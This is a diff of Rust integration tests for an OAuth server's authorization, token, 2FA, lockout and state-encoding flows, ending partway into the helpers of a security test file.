let lockout_res = http_client 1332 .post(format!("{}/oauth/authorize/2fa", url)) 1333 .form(&[("request_uri", request_uri), ("code", "999999")]) 1334 - .send() 1335 - .await 1336 - .unwrap(); 1337 - assert_eq!(lockout_res.status(), StatusCode::OK); 1338 let body = lockout_res.text().await.unwrap(); 1339 - assert!( 1340 - body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"), 1341 - "Should be locked out after max attempts. Body: {}", 1342 - &body[..body.len().min(500)] 1343 - ); 1344 } 1345 #[tokio::test] 1346 - async fn test_account_selector_with_2fa_requires_verification() { 1347 let url = base_url().await; 1348 let http_client = client(); 1349 let ts = Utc::now().timestamp_millis(); ··· 1352 let password = "selector-2fa-password"; 1353 let create_res = http_client 1354 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 1355 - .json(&json!({ 1356 - "handle": handle, 1357 - "email": email, 1358 - "password": password 1359 - })) 1360 - .send() 1361 - .await 1362 - .unwrap(); 1363 - assert_eq!(create_res.status(), StatusCode::OK); 1364 let account: Value = create_res.json().await.unwrap(); 1365 let user_did = account["did"].as_str().unwrap().to_string(); 1366 let redirect_uri = "https://example.com/selector-2fa-callback"; ··· 1369 let (code_verifier, code_challenge) = generate_pkce(); 1370 let par_body: Value = http_client 1371 .post(format!("{}/oauth/par", url)) 1372 - .form(&[ 1373 - ("response_type", "code"), 1374 - ("client_id", &client_id), 1375 - ("redirect_uri", redirect_uri), 1376 - ("code_challenge", &code_challenge), 1377 - ("code_challenge_method", "S256"), 1378 - ]) 1379 - .send() 1380 - .await 1381 - .unwrap() 1382 - .json() 1383 - .await 1384 - .unwrap(); 1385 let request_uri = par_body["request_uri"].as_str().unwrap(); 1386 let auth_client = no_redirect_client(); 1387 let auth_res = auth_client 1388 .post(format!("{}/oauth/authorize", url)) 1389 - .form(&[ 1390 - ("request_uri", request_uri), 1391 - ("username", &handle), 1392 - ("password", password), 1393 - ("remember_device", "true"), 1394 - ]) 1395 - .send() 1396 - .await 1397 - .unwrap(); 1398 assert!(auth_res.status().is_redirection()); 1399 - let device_cookie = auth_res 1400 - .headers() 1401 - .get("set-cookie") 1402 .and_then(|v| v.to_str().ok()) 1403 .map(|s| s.split(';').next().unwrap_or("").to_string()) 1404 - .expect("Should have received device cookie"); 1405 - let location = auth_res 1406 - .headers() 1407 - .get("location") 1408 - .unwrap() 1409 - .to_str() 1410 - .unwrap(); 1411 - assert!(location.contains("code="), "First auth should succeed"); 1412 - let code = location 1413 - .split("code=") 1414 - .nth(1) 1415 - .unwrap() 1416 - .split('&') 1417 - .next() 1418 - .unwrap(); 1419 - let _token_body: Value = http_client 1420 .post(format!("{}/oauth/token", url)) 1421 - .form(&[ 1422 - ("grant_type", "authorization_code"), 1423 - ("code", code), 1424 - ("redirect_uri", redirect_uri), 1425 - ("code_verifier", &code_verifier), 1426 - ("client_id", &client_id), 1427 - ]) 1428 - .send() 1429 - .await 1430 - .unwrap() 1431 - .json() 1432 - .await 1433 - .unwrap(); 1434 - let db_url = common::get_db_connection_string().await; 1435 - let pool = sqlx::postgres::PgPoolOptions::new() 1436 - .max_connections(1) 1437 - .connect(&db_url) 1438 - .await 1439 - .expect("Failed to connect to database"); 1440 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 1441 - .bind(&user_did) 1442 - .execute(&pool) 1443 - .await 1444 - .expect("Failed to enable 2FA"); 1445 let (code_verifier2, code_challenge2) = generate_pkce(); 1446 let par_body2: Value = http_client 1447 .post(format!("{}/oauth/par", url)) 1448 - .form(&[ 1449 - ("response_type", "code"), 1450 - ("client_id", &client_id), 1451 - ("redirect_uri", redirect_uri), 1452 - ("code_challenge", &code_challenge2), 1453 - ("code_challenge_method", "S256"), 1454 - ]) 1455 - .send() 1456 - .await 1457 - .unwrap() 1458 - .json() 1459 - .await 1460 - .unwrap(); 1461 let request_uri2 = par_body2["request_uri"].as_str().unwrap(); 1462 let select_res = auth_client 1463 .post(format!("{}/oauth/authorize/select", url)) 1464 .header("cookie", &device_cookie) 1465 .form(&[("request_uri", request_uri2), ("did", &user_did)]) 1466 - .send() 1467 - .await 1468 - .unwrap(); 1469 - assert!( 1470 - select_res.status().is_redirection(), 1471 - "Account selector should redirect, got status: {}", 1472 - select_res.status() 1473 - ); 1474 - let select_location = select_res 1475 - .headers() 1476 - .get("location") 1477 - .unwrap() 1478 - .to_str() 1479 - .unwrap(); 1480 - assert!( 1481 - select_location.contains("/oauth/authorize/2fa"), 1482 - "Account selector with 2FA enabled should redirect to 2FA page, got: {}", 1483 - select_location 1484 - ); 1485 - let twofa_code: String = 1486 - sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 1487 - .bind(request_uri2) 1488 - .fetch_one(&pool) 1489 - .await 1490 - .expect("Failed to get 2FA code"); 1491 let twofa_res = auth_client 1492 .post(format!("{}/oauth/authorize/2fa", url)) 1493 .header("cookie", &device_cookie) 1494 .form(&[("request_uri", request_uri2), ("code", &twofa_code)]) 1495 - .send() 1496 - .await 1497 - .unwrap(); 1498 assert!(twofa_res.status().is_redirection()); 1499 - let final_location = twofa_res 1500 - .headers() 1501 - .get("location") 1502 - .unwrap() 1503 - .to_str() 1504 - .unwrap(); 1505 - assert!( 1506 - final_location.starts_with(redirect_uri) && final_location.contains("code="), 1507 - "After 2FA, should redirect to client with code, got: {}", 1508 - final_location 1509 - ); 1510 - let final_code = final_location 1511 - .split("code=") 1512 - .nth(1) 1513 - .unwrap() 1514 - .split('&') 1515 - .next() 1516 - .unwrap(); 1517 let token_res = http_client 1518 .post(format!("{}/oauth/token", url)) 1519 - .form(&[ 1520 - ("grant_type", "authorization_code"), 1521 - ("code", final_code), 1522 - ("redirect_uri", redirect_uri), 1523 - ("code_verifier", &code_verifier2), 1524 - ("client_id", &client_id), 1525 - ]) 1526 - .send() 1527 - .await 1528 - .unwrap(); 1529 assert_eq!(token_res.status(), StatusCode::OK); 1530 let final_token: Value = token_res.json().await.unwrap(); 1531 - assert_eq!( 1532 - final_token["sub"], user_did, 1533 - "Token should be for the correct user" 1534 - ); 1535 }
··· 2 mod helpers; 3 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 use chrono::Utc; 5 + use common::{base_url, client, create_account_and_login, get_db_connection_string}; 6 use reqwest::{StatusCode, redirect}; 7 use serde_json::{Value, json}; 8 use sha2::{Digest, Sha256}; ··· 10 use wiremock::{Mock, MockServer, ResponseTemplate}; 11 12 fn no_redirect_client() -> reqwest::Client { 13 + reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap() 14 } 15 16 fn generate_pkce() -> (String, String) { ··· 18 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); 19 let mut hasher = Sha256::new(); 20 hasher.update(code_verifier.as_bytes()); 21 + let code_challenge = URL_SAFE_NO_PAD.encode(&hasher.finalize()); 22 (code_verifier, code_challenge) 23 } 24 ··· 41 .await; 42 mock_server 43 } 44 + 45 #[tokio::test] 46 + async fn test_oauth_metadata_endpoints() { 47 let url = base_url().await; 48 let client = client(); 49 + let pr_res = client.get(format!("{}/.well-known/oauth-protected-resource", url)).send().await.unwrap(); 50 + assert_eq!(pr_res.status(), StatusCode::OK); 51 + let pr_body: Value = pr_res.json().await.unwrap(); 52 + assert!(pr_body["resource"].is_string()); 53 + assert!(pr_body["authorization_servers"].is_array()); 54 + assert!(pr_body["bearer_methods_supported"].as_array().unwrap().contains(&json!("header"))); 55 + let as_res = client.get(format!("{}/.well-known/oauth-authorization-server", url)).send().await.unwrap(); 56 + assert_eq!(as_res.status(), StatusCode::OK); 57 + let as_body: Value = as_res.json().await.unwrap(); 58 + assert!(as_body["issuer"].is_string()); 59 + assert!(as_body["authorization_endpoint"].is_string()); 60 + assert!(as_body["token_endpoint"].is_string()); 61 + assert!(as_body["jwks_uri"].is_string()); 62 + assert!(as_body["response_types_supported"].as_array().unwrap().contains(&json!("code"))); 63 + assert!(as_body["grant_types_supported"].as_array().unwrap().contains(&json!("authorization_code"))); 64 + assert!(as_body["code_challenge_methods_supported"].as_array().unwrap().contains(&json!("S256"))); 65 + assert_eq!(as_body["require_pushed_authorization_requests"], json!(true)); 66 + assert!(as_body["dpop_signing_alg_values_supported"].as_array().unwrap().contains(&json!("ES256"))); 67 + let jwks_res = client.get(format!("{}/oauth/jwks", url)).send().await.unwrap(); 68 + assert_eq!(jwks_res.status(), StatusCode::OK); 69 + let jwks_body: Value = jwks_res.json().await.unwrap(); 70 + assert!(jwks_body["keys"].is_array()); 71 } 72 + 73 #[tokio::test] 74 + async fn test_par_and_authorize() { 75 let url = base_url().await; 76 let client = client(); 77 let redirect_uri = "https://example.com/callback"; ··· 80 let (_, code_challenge) = generate_pkce(); 81 let par_res = client 82 .post(format!("{}/oauth/par", url)) 83 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 84 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", "test-state")]) 85 + .send().await.unwrap(); 86 + assert_eq!(par_res.status(), StatusCode::CREATED, "PAR should succeed"); 87 + let par_body: Value = par_res.json().await.unwrap(); 88 + assert!(par_body["request_uri"].is_string()); 89 + assert!(par_body["expires_in"].is_number()); 90 let request_uri = par_body["request_uri"].as_str().unwrap(); 91 + assert!(request_uri.starts_with("urn:ietf:params:oauth:request_uri:")); 92 let auth_res = client 93 .get(format!("{}/oauth/authorize", url)) 94 .header("Accept", "application/json") 95 .query(&[("request_uri", request_uri)]) 96 + .send().await.unwrap(); 97 assert_eq!(auth_res.status(), StatusCode::OK); 98 + let auth_body: Value = auth_res.json().await.unwrap(); 99 assert_eq!(auth_body["client_id"], client_id); 100 assert_eq!(auth_body["redirect_uri"], redirect_uri); 101 assert_eq!(auth_body["scope"], "atproto"); 102 + let invalid_res = client 103 .get(format!("{}/oauth/authorize", url)) 104 .header("Accept", "application/json") 105 + .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")]) 106 + .send().await.unwrap(); 107 + assert_eq!(invalid_res.status(), StatusCode::BAD_REQUEST); 108 + let missing_res = client.get(format!("{}/oauth/authorize", url)).send().await.unwrap(); 109 + assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 110 } 111 + 112 #[tokio::test] 113 + async fn test_full_oauth_flow() { 114 let url = base_url().await; 115 let http_client = client(); 116 let ts = Utc::now().timestamp_millis(); 117 let handle = format!("oauth-test-{}", ts); 118 let email = format!("oauth-test-{}@example.com", ts); 119 let password = "oauth-test-password"; 120 let create_res = http_client 121 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 122 + .json(&json!({ "handle": handle, "email": email, "password": password })) 123 + .send().await.unwrap(); 124 assert_eq!(create_res.status(), StatusCode::OK); 125 let account: Value = create_res.json().await.unwrap(); 126 let user_did = account["did"].as_str().unwrap(); ··· 131 let state = format!("state-{}", ts); 132 let par_res = http_client 133 .post(format!("{}/oauth/par", url)) 134 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 135 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", &state)]) 136 + .send().await.unwrap(); 137 + let par_body: Value = par_res.json().await.unwrap(); 138 let request_uri = par_body["request_uri"].as_str().unwrap(); 139 let auth_client = no_redirect_client(); 140 let auth_res = auth_client 141 .post(format!("{}/oauth/authorize", url)) 142 + .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 143 + .send().await.unwrap(); 144 + assert!(auth_res.status().is_redirection(), "Expected redirect, got {}", auth_res.status()); 145 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 146 + assert!(location.starts_with(redirect_uri), "Redirect to wrong URI"); 147 + assert!(location.contains("code="), "No code in redirect"); 148 + assert!(location.contains(&format!("state={}", state)), "Wrong state"); 149 + let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 150 let token_res = http_client 151 .post(format!("{}/oauth/token", url)) 152 + .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 153 + ("code_verifier", &code_verifier), ("client_id", &client_id)]) 154 + .send().await.unwrap(); 155 + assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed"); 156 + let token_body: Value = token_res.json().await.unwrap(); 157 assert!(token_body["access_token"].is_string()); 158 assert!(token_body["refresh_token"].is_string()); 159 assert_eq!(token_body["token_type"], "Bearer"); 160 assert!(token_body["expires_in"].is_number()); 161 assert_eq!(token_body["sub"], user_did); 162 + let access_token = token_body["access_token"].as_str().unwrap(); 163 let refresh_token = token_body["refresh_token"].as_str().unwrap(); 164 let refresh_res = http_client 165 .post(format!("{}/oauth/token", url)) 166 + .form(&[("grant_type", "refresh_token"), ("refresh_token", refresh_token), ("client_id", &client_id)]) 167 + .send().await.unwrap(); 168 assert_eq!(refresh_res.status(), StatusCode::OK); 169 let refresh_body: Value = refresh_res.json().await.unwrap(); 170 + assert_ne!(refresh_body["access_token"].as_str().unwrap(), access_token); 171 + assert_ne!(refresh_body["refresh_token"].as_str().unwrap(), refresh_token); 172 + let introspect_res = http_client 173 + .post(format!("{}/oauth/introspect", url)) 174 + .form(&[("token", refresh_body["access_token"].as_str().unwrap())]) 175 + .send().await.unwrap(); 176 + assert_eq!(introspect_res.status(), StatusCode::OK); 177 + let introspect_body: Value = introspect_res.json().await.unwrap(); 178 + assert_eq!(introspect_body["active"], true); 179 + let revoke_res = http_client 180 + .post(format!("{}/oauth/revoke", url)) 181 + .form(&[("token", refresh_body["refresh_token"].as_str().unwrap())]) 182 + .send().await.unwrap(); 183 + assert_eq!(revoke_res.status(), StatusCode::OK); 184 + let introspect_after = http_client 185 + .post(format!("{}/oauth/introspect", url)) 186 + .form(&[("token", refresh_body["access_token"].as_str().unwrap())]) 187 + .send().await.unwrap(); 188 + let after_body: Value = introspect_after.json().await.unwrap(); 189 + assert_eq!(after_body["active"], false, "Revoked token should be inactive"); 190 } 191 + 192 #[tokio::test] 193 + async fn test_oauth_error_cases() { 194 let url = base_url().await; 195 let http_client = client(); 196 let ts = Utc::now().timestamp_millis(); 197 let handle = format!("wrong-creds-{}", ts); 198 let email = format!("wrong-creds-{}@example.com", ts); 199 + http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 200 + .json(&json!({ "handle": handle, "email": email, "password": "correct-password" })) 201 + .send().await.unwrap(); 202 + let redirect_uri = "https://example.com/callback"; 203 let mock_client = setup_mock_client_metadata(redirect_uri).await; 204 let client_id = mock_client.uri(); 205 let (_, code_challenge) = generate_pkce(); 206 let par_body: Value = http_client 207 .post(format!("{}/oauth/par", url)) 208 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 209 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 210 + .send().await.unwrap().json().await.unwrap(); 211 let request_uri = par_body["request_uri"].as_str().unwrap(); 212 let auth_res = http_client 213 .post(format!("{}/oauth/authorize", url)) 214 .header("Accept", "application/json") 215 + .form(&[("request_uri", request_uri), ("username", &handle), ("password", "wrong-password"), ("remember_device", "false")]) 216 + .send().await.unwrap(); 217 assert_eq!(auth_res.status(), StatusCode::FORBIDDEN); 218 let error_body: Value = auth_res.json().await.unwrap(); 219 assert_eq!(error_body["error"], "access_denied"); 220 + let unsupported = http_client 221 .post(format!("{}/oauth/token", url)) 222 + .form(&[("grant_type", "client_credentials"), ("client_id", "https://example.com")]) 223 + .send().await.unwrap(); 224 + assert_eq!(unsupported.status(), StatusCode::BAD_REQUEST); 225 + let body: Value = unsupported.json().await.unwrap(); 226 assert_eq!(body["error"], "unsupported_grant_type"); 227 + let invalid_refresh = http_client 228 .post(format!("{}/oauth/token", url)) 229 + .form(&[("grant_type", "refresh_token"), ("refresh_token", "invalid-token"), ("client_id", "https://example.com")]) 230 + .send().await.unwrap(); 231 + assert_eq!(invalid_refresh.status(), StatusCode::BAD_REQUEST); 232 + let body: Value = invalid_refresh.json().await.unwrap(); 233 assert_eq!(body["error"], "invalid_grant"); 234 + let invalid_introspect = http_client 235 .post(format!("{}/oauth/introspect", url)) 236 .form(&[("token", "invalid.token.here")]) 237 + .send().await.unwrap(); 238 + assert_eq!(invalid_introspect.status(), StatusCode::OK); 239 + let body: Value = invalid_introspect.json().await.unwrap(); 240 assert_eq!(body["active"], false); 241 + let expired_res = http_client 242 + .get(format!("{}/oauth/authorize", url)) 243 + .header("Accept", "application/json") 244 + .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired")]) 245 + .send().await.unwrap(); 246 + assert_eq!(expired_res.status(), StatusCode::BAD_REQUEST); 247 } 248 + 249 #[tokio::test] 250 + async fn test_oauth_2fa_flow() { 251 let url = base_url().await; 252 let http_client = client(); 253 let ts = Utc::now().timestamp_millis(); 254 + let handle = format!("2fa-test-{}", ts); 255 + let email = format!("2fa-test-{}@example.com", ts); 256 let password = "2fa-test-password"; 257 let create_res = http_client 258 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 259 + .json(&json!({ "handle": handle, "email": email, "password": password })) 260 + .send().await.unwrap(); 261 assert_eq!(create_res.status(), StatusCode::OK); 262 let account: Value = create_res.json().await.unwrap(); 263 let user_did = account["did"].as_str().unwrap(); 264 + let db_url = get_db_connection_string().await; 265 + let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap(); 266 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 267 + .bind(user_did).execute(&pool).await.unwrap(); 268 let redirect_uri = "https://example.com/2fa-callback"; 269 let mock_client = setup_mock_client_metadata(redirect_uri).await; 270 let client_id = mock_client.uri(); 271 + let (code_verifier, code_challenge) = generate_pkce(); 272 let par_body: Value = http_client 273 .post(format!("{}/oauth/par", url)) 274 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 275 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 276 + .send().await.unwrap().json().await.unwrap(); 277 let request_uri = par_body["request_uri"].as_str().unwrap(); 278 let auth_client = no_redirect_client(); 279 let auth_res = auth_client 280 .post(format!("{}/oauth/authorize", url)) 281 + .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 282 + .send().await.unwrap(); 283 + assert!(auth_res.status().is_redirection(), "Should redirect to 2FA page"); 284 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 285 + assert!(location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page, got: {}", location); 286 + let twofa_invalid = http_client 287 .post(format!("{}/oauth/authorize/2fa", url)) 288 .form(&[("request_uri", request_uri), ("code", "000000")]) 289 + .send().await.unwrap(); 290 + assert_eq!(twofa_invalid.status(), StatusCode::OK); 291 + let body = twofa_invalid.text().await.unwrap(); 292 + assert!(body.contains("Invalid verification code") || body.contains("invalid")); 293 + let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 294 + .bind(request_uri).fetch_one(&pool).await.unwrap(); 295 let twofa_res = auth_client 296 .post(format!("{}/oauth/authorize/2fa", url)) 297 .form(&[("request_uri", request_uri), ("code", &twofa_code)]) 298 + .send().await.unwrap(); 299 + assert!(twofa_res.status().is_redirection(), "Valid 2FA code should redirect"); 300 + let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 301 + assert!(final_location.starts_with(redirect_uri) && final_location.contains("code=")); 302 + let auth_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 303 let token_res = http_client 304 .post(format!("{}/oauth/token", url)) 305 + .form(&[("grant_type", "authorization_code"), ("code", auth_code), ("redirect_uri", redirect_uri), 306 + ("code_verifier", &code_verifier), ("client_id", &client_id)]) 307 + .send().await.unwrap(); 308 + assert_eq!(token_res.status(), StatusCode::OK); 309 let token_body: Value = token_res.json().await.unwrap(); 310 assert_eq!(token_body["sub"], user_did); 311 } 312 + 313 #[tokio::test] 314 + async fn test_oauth_2fa_lockout() { 315 let url = base_url().await; 316 let http_client = client(); 317 let ts = Utc::now().timestamp_millis(); ··· 320 let password = "2fa-test-password"; 321 let create_res = http_client 322 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 323 + .json(&json!({ "handle": handle, "email": email, "password": password })) 324 + .send().await.unwrap(); 325 let account: Value = create_res.json().await.unwrap(); 326 let user_did = account["did"].as_str().unwrap(); 327 + let db_url = get_db_connection_string().await; 328 + let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap(); 329 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 330 + .bind(user_did).execute(&pool).await.unwrap(); 331 let redirect_uri = "https://example.com/2fa-lockout-callback"; 332 let mock_client = setup_mock_client_metadata(redirect_uri).await; 333 let client_id = mock_client.uri(); 334 let (_, code_challenge) = generate_pkce(); 335 let par_body: Value = http_client 336 .post(format!("{}/oauth/par", url)) 337 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 338 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 339 + .send().await.unwrap().json().await.unwrap(); 340 let request_uri = par_body["request_uri"].as_str().unwrap(); 341 let auth_client = no_redirect_client(); 342 let auth_res = auth_client 343 .post(format!("{}/oauth/authorize", url)) 344 + .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 345 + .send().await.unwrap(); 346 assert!(auth_res.status().is_redirection()); 347 for i in 0..5 { 348 let res = http_client 349 .post(format!("{}/oauth/authorize/2fa", url)) 350 .form(&[("request_uri", request_uri), ("code", "999999")]) 351 + .send().await.unwrap(); 352 if i < 4 { 353 + assert_eq!(res.status(), StatusCode::OK); 354 } 355 } 356 let lockout_res = http_client 357 .post(format!("{}/oauth/authorize/2fa", url)) 358 .form(&[("request_uri", request_uri), ("code", "999999")]) 359 + .send().await.unwrap(); 360 let body = lockout_res.text().await.unwrap(); 361 + assert!(body.contains("Too many failed attempts") || body.contains("No 2FA challenge found")); 362 } 363 + 364 #[tokio::test] 365 + async fn test_account_selector_with_2fa() { 366 let url = base_url().await; 367 let http_client = client(); 368 let ts = Utc::now().timestamp_millis(); ··· 371 let password = "selector-2fa-password"; 372 let create_res = http_client 373 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 374 + .json(&json!({ "handle": handle, "email": email, "password": password })) 375 + .send().await.unwrap(); 376 let account: Value = create_res.json().await.unwrap(); 377 let user_did = account["did"].as_str().unwrap().to_string(); 378 let redirect_uri = "https://example.com/selector-2fa-callback"; ··· 381 let (code_verifier, code_challenge) = generate_pkce(); 382 let par_body: Value = http_client 383 .post(format!("{}/oauth/par", url)) 384 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 385 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 386 + .send().await.unwrap().json().await.unwrap(); 387 let request_uri = par_body["request_uri"].as_str().unwrap(); 388 let auth_client = no_redirect_client(); 389 let auth_res = auth_client 390 .post(format!("{}/oauth/authorize", url)) 391 + .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "true")]) 392 + .send().await.unwrap(); 393 assert!(auth_res.status().is_redirection()); 394 + let device_cookie = auth_res.headers().get("set-cookie") 395 .and_then(|v| v.to_str().ok()) 396 .map(|s| s.split(';').next().unwrap_or("").to_string()) 397 + .expect("Should have device cookie"); 398 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 399 + assert!(location.contains("code=")); 400 + let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 401 + let _ = http_client 402 .post(format!("{}/oauth/token", url)) 403 + .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 404 + ("code_verifier", &code_verifier), ("client_id", &client_id)]) 405 + .send().await.unwrap().json::<Value>().await.unwrap(); 406 + let db_url = get_db_connection_string().await; 407 + let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap(); 408 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 409 + .bind(&user_did).execute(&pool).await.unwrap(); 410 let (code_verifier2, code_challenge2) = generate_pkce(); 411 let par_body2: Value = http_client 412 .post(format!("{}/oauth/par", url)) 413 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 414 + ("code_challenge", &code_challenge2), ("code_challenge_method", "S256")]) 415 + .send().await.unwrap().json().await.unwrap(); 416 let request_uri2 = par_body2["request_uri"].as_str().unwrap(); 417 let select_res = auth_client 418 .post(format!("{}/oauth/authorize/select", url)) 419 .header("cookie", &device_cookie) 420 .form(&[("request_uri", request_uri2), ("did", &user_did)]) 421 + .send().await.unwrap(); 422 + assert!(select_res.status().is_redirection()); 423 + let select_location = select_res.headers().get("location").unwrap().to_str().unwrap(); 424 + assert!(select_location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page"); 425 + let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 426 + .bind(request_uri2).fetch_one(&pool).await.unwrap(); 427 let twofa_res = auth_client 428 .post(format!("{}/oauth/authorize/2fa", url)) 429 .header("cookie", &device_cookie) 430 .form(&[("request_uri", request_uri2), ("code", &twofa_code)]) 431 + .send().await.unwrap(); 432 assert!(twofa_res.status().is_redirection()); 433 + let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 434 + assert!(final_location.starts_with(redirect_uri) && final_location.contains("code=")); 435 + let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 436 let token_res = http_client 437 .post(format!("{}/oauth/token", url)) 438 + .form(&[("grant_type", "authorization_code"), ("code", final_code), ("redirect_uri", redirect_uri), 439 + ("code_verifier", &code_verifier2), ("client_id", &client_id)]) 440 + .send().await.unwrap(); 441 assert_eq!(token_res.status(), StatusCode::OK); 442 let final_token: Value = token_res.json().await.unwrap(); 443 + assert_eq!(final_token["sub"], user_did); 444 + } 445 + 446 + #[tokio::test] 447 + async fn test_oauth_state_encoding() { 448 + let url = base_url().await; 449 + let http_client = client(); 450 + let ts = Utc::now().timestamp_millis(); 451 + let handle = format!("state-special-{}", ts); 452 + let email = format!("state-special-{}@example.com", ts); 453 + let password = "state-special-password"; 454 + http_client 455 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 456 + .json(&json!({ "handle": handle, "email": email, "password": password })) 457 + .send().await.unwrap(); 458 + let redirect_uri = "https://example.com/state-special-callback"; 459 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 460 + let client_id = mock_client.uri(); 461 + let (_, code_challenge) = generate_pkce(); 462 + let special_state = "state=with&special=chars&plus+more"; 463 + let par_body: Value = http_client 464 + .post(format!("{}/oauth/par", url)) 465 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 466 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("state", special_state)]) 467 + .send().await.unwrap().json().await.unwrap(); 468 + let request_uri = par_body["request_uri"].as_str().unwrap(); 469 + let auth_client = no_redirect_client(); 470 + let auth_res = auth_client 471 + .post(format!("{}/oauth/authorize", url)) 472 + .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 473 + .send().await.unwrap(); 474 + assert!(auth_res.status().is_redirection()); 475 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 476 + assert!(location.contains("state=")); 477 + let encoded_state = urlencoding::encode(special_state); 478 + assert!(location.contains(&format!("state={}", encoded_state)), "State should be URL-encoded. Got: {}", location); 479 }
+302 -1627
tests/oauth_security.rs
··· 1 #![allow(unused_imports)] 2 - #![allow(unused_variables)] 3 mod common; 4 mod helpers; 5 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; ··· 14 use wiremock::{Mock, MockServer, ResponseTemplate}; 15 16 fn no_redirect_client() -> reqwest::Client { 17 - reqwest::Client::builder() 18 - .redirect(redirect::Policy::none()) 19 - .build() 20 - .unwrap() 21 } 22 23 fn generate_pkce() -> (String, String) { ··· 25 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); 26 let mut hasher = Sha256::new(); 27 hasher.update(code_verifier.as_bytes()); 28 - let hash = hasher.finalize(); 29 - let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 30 (code_verifier, code_challenge) 31 } 32 33 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 34 let mock_server = MockServer::start().await; 35 - let client_id = mock_server.uri(); 36 let metadata = json!({ 37 - "client_id": client_id, 38 "client_name": "Security Test Client", 39 "redirect_uris": [redirect_uri], 40 "grant_types": ["authorization_code", "refresh_token"], ··· 42 "token_endpoint_auth_method": "none", 43 "dpop_bound_access_tokens": false 44 }); 45 - Mock::given(method("GET")) 46 - .and(path("/")) 47 .respond_with(ResponseTemplate::new(200).set_body_json(metadata)) 48 - .mount(&mock_server) 49 - .await; 50 mock_server 51 } 52 53 async fn get_oauth_tokens(http_client: &reqwest::Client, url: &str) -> (String, String, String) { 54 let ts = Utc::now().timestamp_millis(); 55 let handle = format!("sec-test-{}", ts); 56 - let email = format!("sec-test-{}@example.com", ts); 57 - let password = "security-test-password"; 58 - http_client 59 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 60 - .json(&json!({ 61 - "handle": handle, 62 - "email": email, 63 - "password": password 64 - })) 65 - .send() 66 - .await 67 - .unwrap(); 68 let redirect_uri = "https://example.com/sec-callback"; 69 let mock_client = setup_mock_client_metadata(redirect_uri).await; 70 let client_id = mock_client.uri(); 71 let (code_verifier, code_challenge) = generate_pkce(); 72 - let par_body: Value = http_client 73 - .post(format!("{}/oauth/par", url)) 74 - .form(&[ 75 - ("response_type", "code"), 76 - ("client_id", &client_id), 77 - ("redirect_uri", 